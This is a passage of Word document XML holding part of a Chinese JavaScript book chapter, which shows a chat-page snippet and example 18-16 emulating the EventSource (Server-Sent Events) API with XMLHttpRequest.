    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>发送消</w:t>
      </w:r>
      <w:r>
        <w:t>息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.value="";//</w:t>
      </w:r>
      <w:r>
        <w:t>准备下次输入</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w:t>
      </w:r>
      <w:r>
        <w:t>聊天的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>只是一个单行文本域</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>新的聊天消息会插入</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>域之前</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id="input"style="width:100%"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在写这本书的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>已开始支持</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>也准备在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4.0</w:t>
      </w:r>
      <w:r>
        <w:t>之后的第一个版本中实现它。其</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>实现在下载过程中会（为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">readyState </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）触发</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件的浏览器（例如</w:t>
      </w:r>
      <w:r>
        <w:t>FireFox</w:t>
      </w:r>
      <w:r>
        <w:t>），可以很容易地使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-16</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何完成。配合这个模拟模块，例</w:t>
      </w:r>
      <w:r>
        <w:t>18-15</w:t>
      </w:r>
      <w:r>
        <w:t>就可以工作在</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>下了。（例</w:t>
      </w:r>
      <w:r>
        <w:t>18-16</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>下不可用，直到它们的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>实现在下载过程中能够产生事件为止。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-16</w:t>
      </w:r>
      <w:r>
        <w:t>：用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在不支持</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource API</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器里进</w:t>
      </w:r>
      <w:r>
        <w:t>行模拟</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>需要有一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象在新数据写到长期存在的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>连接中时发送</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，这个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的实现是不完整的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它不支持</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性、</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法、</w:t>
      </w:r>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>消息事件也是通过</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>属性注册的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这个版本还没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>add EventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(window.EventSource===undefined){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果未定义</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.EventSou</w:t>
      </w:r>
      <w:r>
        <w:t>rce=function(url){//</w:t>
      </w:r>
      <w:r>
        <w:t>像这样进行模拟</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr;//HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>连接器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var evtsrc=this;//</w:t>
      </w:r>
      <w:r>
        <w:t>在事件处理程序中用到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var charsReceived=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>这样我们就可以知道什么是新的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type=null;//</w:t>
      </w:r>
      <w:r>
        <w:t>检查属性响应类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data="";//</w:t>
      </w:r>
      <w:r>
        <w:t>存放消息数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var eventName="message";//</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象的类型字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var lastEventId="";//</w:t>
      </w:r>
      <w:r>
        <w:t>用于和服务器再次同步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var retrydelay=1000;//</w:t>
      </w:r>
      <w:r>
        <w:t>在多个连接请求之</w:t>
      </w:r>
      <w:r>
        <w:t>间设置延迟</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var aborted=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>表示放弃连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>XHR</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onreadystatechange=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(xhr.readyState){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 3:processData();break;//</w:t>
      </w:r>
      <w:r>
        <w:t>当数据块到达时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 4:reconnect();break;//</w:t>
      </w:r>
      <w:r>
        <w:t>当请求关闭的时候</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>connect()</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个长期存在的连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>connect();//</w:t>
      </w:r>
      <w:r>
        <w:t>如果连接正常关闭，等待</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>秒钟再尝试连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function reconnect(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(aborted)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>在终止连接后不进行重连操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(xhr.status</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=300)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>在报错之后不进行重连操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(connect,retrydelay);//</w:t>
      </w:r>
      <w:r>
        <w:t>等待</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>秒后进行重连</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的代码展示了如何建立一个连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function connect(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>charsReceived=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>type=null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("GET",url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.setRequestHeader("Cache-Control","no-cache");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(lastEventId)xhr.setRequestHeader("Last-Event-ID",lastEventId);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每当数据到达的时候，会处理并触发</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数处理</w:t>
      </w:r>
      <w:r>
        <w:t>Server-Send Events</w:t>
      </w:r>
      <w:r>
        <w:t>协议的细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function processData(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!type){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有准</w:t>
      </w:r>
      <w:r>
        <w:t>备好，先检查响应类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>type=xhr.getResponseHeader('Content-Type');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(type!=="text/event-stream"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>aborted=true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.abort();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>记录接收的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获得响应中未处理的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var chunk=xhr.responseText.substring(charsReceived);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>charsReceived=xhr.responseText.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>将大块的文本数据分成多行并</w:t>
      </w:r>
      <w:r>
        <w:t>遍历它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lines=chunk.replace(/(\r\n|\r|\n)$/,"").split(/\r\n|\r|\n/);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>lines.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var line=lines[i],pos=line.indexOf(":"),name,value="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(pos==0)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(pos</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0){//</w:t>
      </w:r>
      <w:r>
        <w:t>字段名称：值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=line.substring(0,pos);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value=line.substring(pos+1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(value.charAt(0)=="")value=value.substring(1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else name=line;//</w:t>
      </w:r>
      <w:r>
        <w:t>只有字段名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(name){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"event":eventName=value;break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"data":data+=value+"\n";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"id":lastEventId=value;break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"retry":retrydelay=parseInt(va</w:t>
      </w:r>
      <w:r>
        <w:t>lue)||1000;break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>default:break;//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略其他行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(line===""){//</w:t>
      </w:r>
      <w:r>
        <w:t>一个空行意味着发送事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(evtsrc.onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>data!==""){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果末尾有新行，就裁剪新行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(data.charAt(data.length-1)=="\n")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data=data.substring(0,data.length-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>evtsrc.onmessage({//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是一个伪造的事件对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>type:eventName,//</w:t>
      </w:r>
      <w:r>
        <w:t>事件类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data:data,//</w:t>
      </w:r>
      <w:r>
        <w:t>事件数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>origin:url//</w:t>
      </w:r>
      <w:r>
        <w:t>数据源</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>continue;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我们通过一个服务器示例结束了</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
